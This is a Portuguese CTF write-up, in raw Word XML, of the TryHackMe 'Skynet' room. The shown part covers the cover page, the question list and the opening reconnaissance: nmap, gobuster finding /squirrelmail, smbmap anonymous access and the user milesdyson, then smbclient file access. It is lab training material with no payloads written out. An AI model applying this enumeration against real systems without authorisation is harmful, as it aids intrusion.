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B7FD2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E74E59B" wp14:editId="05992981">
            <wp:extent cx="5400040" cy="2169795"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Imagem 7" descr="Logotip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7" descr="Logotipo&#10;&#10;Descrição gerada automaticamente com confiança baixa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E3999F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418925AE" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="0000000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45775189" w14:textId="1A7237C7" w:rsidR="00126C16" w:rsidRDefault="003D7612">
      <w:pPr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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Skynet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D7FDFFF" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16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Layout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4247"/>
        <w:gridCol w:w="4247"/>
      </w:tblGrid>
      <w:tr w:rsidR="00126C16" w14:paraId="6CEAE7FD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DC0EA56" w14:textId="77777777" w:rsidR="00126C16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documento</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126C16" w14:paraId="4D66B77B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="417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D3C4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2CD9C" w14:textId="2CD8E407" w:rsidR="00126C16" w:rsidRDefault="003D7612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Skynet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Guilherme </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Thomasi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ronca</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126C16" w14:paraId="5D32B00E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="42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9D367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21EF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126C16" w14:paraId="55A868B4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="41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8E7F1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071C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06/10/2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126C16" w14:paraId="5DB1E959" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="41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5AFB0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Link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1B4CD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https://tryhackme.com/room/skynet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D51E31C" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16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Layout w:type="fixed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26C16" w14:paraId="19448641" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="358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2729B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Redação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35816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Guilherme Thomasi Ronca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70B2D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126C16" w14:paraId="7E2CCB5C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="420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F3B56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43646" w14:textId="53DC92ED" w:rsidR="00126C16" w:rsidRDefault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2E1C9" w14:textId="75AA40C0" w:rsidR="00126C16" w:rsidRDefault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  <w:tr w:rsidR="003D7612" w14:paraId="46182819" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="426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2857B" w14:textId="77777777" w:rsidR="003D7612" w:rsidRDefault="003D7612" w:rsidP="003D7612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7794F" w14:textId="5E9E3534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572F7" w14:textId="283E066A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</w:tbl>
    <w:p w14:paraId="27C73408" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16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Layout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="704"/>
        <w:gridCol w:w="2126"/>
        <w:gridCol w:w="5664"/>
      </w:tblGrid>
      <w:tr w:rsidR="00126C16" w14:paraId="18B31C4B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="368"/>
        </w:trPr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CE6E" w14:textId="77777777" w:rsidR="00126C16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Histórico de revisões</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126C16" w14:paraId="1D4C66AE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="41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123EB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BAA78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Entregas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64A1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3D7612" w14:paraId="7DD57832" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="40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BF429" w14:textId="77777777" w:rsidR="003D7612" w:rsidRDefault="003D7612" w:rsidP="003D7612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7F4B" w14:textId="244340A7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06/10/2025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3524" w14:textId="77777777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126C16" w14:paraId="008918FB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="42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1195E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E0B8" w14:textId="1DF70573" w:rsidR="00126C16" w:rsidRDefault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23/03/2026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EE2E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3D7612" w14:paraId="4F209535" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="406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0067D" w14:textId="77777777" w:rsidR="003D7612" w:rsidRDefault="003D7612" w:rsidP="003D7612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5B0D1" w14:textId="25629B0E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23/03/2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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D2B3D" w14:textId="77777777" w:rsidR="003D7612" w:rsidRDefault="003D7612" w:rsidP="003D7612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3008E81F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60BDCD3E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6C77B783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Layout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4247"/>
        <w:gridCol w:w="4247"/>
      </w:tblGrid>
      <w:tr w:rsidR="00126C16" w14:paraId="5E4E1FCF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47C7FD52" w14:textId="77777777" w:rsidR="00126C16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CTF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126C16" w14:paraId="689476BA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="417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72D0D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8384B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Fácil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126C16" w14:paraId="3F668BB6" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="42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BA37A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B33FF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Pago</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126C16" w:rsidRPr="004225B7" w14:paraId="45465126" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="41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AA94C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D9CD5" w14:textId="566FB31F" w:rsidR="00126C16" w:rsidRPr="004225B7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004225B7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Linux, Web, Privilege Escalation, Reverse Shell, Exploits</w:t>
            </w:r>
            <w:r w:rsidR="004225B7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4225B7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Smb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126C16" w14:paraId="26931AE9" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="41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3FA5E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8C0A3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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00126C16" w14:paraId="571854C1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="412"/>
        </w:trPr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37C" w14:textId="77777777" w:rsidR="00126C16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009E4" w14:textId="77777777" w:rsidR="00126C16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Red</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B7863A7" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/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</w:p>
    <w:p w14:paraId="3493DAF4" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/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Sumário</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-740475812"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="2743A1F4" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00000000">
          <w:pP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rPr>
              <w:rStyle w:val="IndexLink"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-9" \t "heading 1,1,heading 2,2,heading 3,3" \h</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="IndexLink"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_heading=h.gjdgxs">
            <w:r w:rsidR="00126C16">
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Contextualização</w:t>
            </w:r>
            <w:r w:rsidR="00126C16">
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68A8C2EA" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16">
          <w:pP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30j0zll">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Subtítulo caso necessário</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D4A6A78" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16">
          <w:pP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fob9te">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Desenvolvimento</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1AE340CF" w14:textId="2AFEE2C4" w:rsidR="00126C16" w:rsidRDefault="004225B7">
          <w:pP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3znysh7">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>What is Miles Password for his emails</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B39F60E" w14:textId="3B6DD630" w:rsidR="00126C16" w:rsidRDefault="004225B7">
          <w:pP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2et92p0">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>What is the hidden directory</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19A13B0C" w14:textId="11F00A58" w:rsidR="00126C16" w:rsidRDefault="004225B7">
          <w:pP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tyjcwt">
            <w:r w:rsidRPr="004225B7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>What is the vulnerability called when you can include a remote file for malicious purposes?</w:t>
            </w:r>
            <w:r w:rsidR="00000000" w:rsidRPr="004225B7">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59630B88" w14:textId="4704FE83" w:rsidR="00126C16" w:rsidRPr="004225B7" w:rsidRDefault="004225B7">
          <w:pP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  <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="004225B7">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>What is the user flag?</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:br/>
            <w:t>What is the root flag?</w:t>
          </w:r>
          <w:hyperlink w:anchor="_heading=h.3dy6vkm">
            <w:r w:rsidRPr="004225B7">
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47BE47E2" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16">
          <w:pP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t3h5sf">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Conclusão</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69D87D05" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16">
          <w:pP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4d34og8">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Referências</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidR="00000000">
            <w:rPr>
              <w:rStyle w:val="IndexLink"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="31411371" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16"/>
    <w:p w14:paraId="28939BBC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41CA524A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09C3B64E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34358483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04295595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40C4ED40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5DCE8BF6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57DC42CB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37FB4B33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3E80BB1E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6B9754B3" w14:textId="77777777" w:rsidR="00126C16" w:rsidRDefault="00126C16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="279938F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0" w:name="_heading=h.gjdgxs"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3C2AF86E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Contextualização</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57895D3D" w14:textId="3910992F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CTF pago da plataforma TryHackMe. O sistema é baseado no mundo de Terminator, e utiliza um servidor da Skynet que sera o alvo principal do desafio. Para completar o CTF, é necess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rio conhecimento de Smbd, Reverse Shell e Privilege Escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCADFBA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40F5B1FF" w14:textId="77777777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</w:pPr>
      <w:bookmarkStart w:id="1" w:name="_heading=h.1fob9te"/>
      <w:bookmarkEnd w:id="1"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004225B7"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  <w:t>Desenvolvimento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2CBA4BCB" w14:textId="77777777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Miles password for his e-mails?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FA8184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Primeiramente, fiz um nmap para encontrar portas abertas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02476578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anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="32" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="5FD9E432" wp14:editId="4514440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05400" cy="243840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39DD085" w14:textId="3D9F62A4" w:rsidR="003D7612" w:rsidRDefault="003D761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26981595" w14:textId="77777777" w:rsidR="003D7612" w:rsidRDefault="003D7612">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="080C6F23" w14:textId="3185586B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Como http est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 xml:space="preserve"> aberto, coloquei o IP da </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>maquina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na web: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60104137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33" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="3583AA86" wp14:editId="17319D9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00040" cy="269684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9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AA2B35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EC6E87E" w14:textId="262C375F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Como não encontrei nada de </w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ú</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>til no site principal, rodei um gobuster para encontrar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rios adicionais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD22C73" w14:textId="69B3DA96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35" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="657670B5" wp14:editId="0BCEAFF7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>22860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="318643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8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724B2A" w14:textId="04804B3E" w:rsidR="003D7612" w:rsidRDefault="003D761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48D34218" w14:textId="77777777" w:rsidR="003D7612" w:rsidRDefault="003D7612">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D00093A" w14:textId="266EC46D" w:rsidR="00126C16" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Apos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visitar alguns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rios, o único com informa</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çã</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o era o /squirrelmail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756EBA8D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36" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="134152E7" wp14:editId="4C1615EC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>24765</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="307911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7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3F7B42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0C7ED0D" w14:textId="12D17B6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2D15964" w14:textId="0977E1A2" w:rsidR="003D7612" w:rsidRPr="003D7612" w:rsidRDefault="003D7612" w:rsidP="003D7612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37" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="0653ECCF" wp14:editId="5717B4B4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>917731</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="2435860"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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3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00000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Acessei o Metasploit para tentar encontrar vulnerabilidades do sistema. Rodei um nmap e salvei no arquivo scan.xml, com isso importei o documento para o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58735F94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39" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="777ECDC5" wp14:editId="56A8E5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89953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99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D26917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BA8A216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anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="38" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="286E697D" wp14:editId="2ED1B99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30378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F5EDD83" w14:textId="75232A0B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Desses servi</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ç</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>os rodando no servidor, sei que a ferramenta smbmap consegue fazer uma enumera</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çã</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o do servico smdb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7564DB4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93D3A30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CEE25F7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40" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="3EC91C16" wp14:editId="4447501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86915"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="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8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336F76" w14:textId="6483323F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o smbmap, descubro que é possível fazer login utilizando anonymous. Tamb</w:t>
      </w:r>
      <w:r w:rsidR="008405CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m descubro o usu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rio milesdyson.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B47F016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1" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="7ED90D06" wp14:editId="67D58AA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789940"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="1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1D25D40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2" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="06340840" wp14:editId="152D36D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341880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="1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41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E503166" w14:textId="57FE6029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Utilizando smbclient, consigo fazer login na m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quina, onde encontro 3 arquivos de interesse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2583E508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3" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="029DF422" wp14:editId="00AB72E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54355"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="1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4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F6289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180FE88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CB165A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C964F26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44" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="4C63C463" wp14:editId="2A71EAD8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-71755</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-63500</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2495550" cy="4191000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
